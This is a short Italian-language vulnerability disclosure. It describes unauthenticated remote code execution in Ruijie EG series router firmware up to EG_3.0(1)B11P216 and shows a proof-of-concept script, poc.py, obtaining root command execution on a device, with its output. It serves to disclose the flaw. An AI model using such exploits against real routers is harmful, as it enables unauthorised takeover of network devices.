
Il firmware dei router della serie Ruijie EG, versione <=EG_3.0(1)B11P216, consente ad attaccanti non autenticati di eseguire codice arbitrario da remoto a causa di un filtraggio errato.
$ python3 poc.py 192.168.1.1 'id'
uid=0(root) gid=0(root)
$ python3 poc.py 192.168.1.1 'grep TARGET /etc/openwrt_release'
DISTRIB_TARGET='mediatek/eg310gh-e'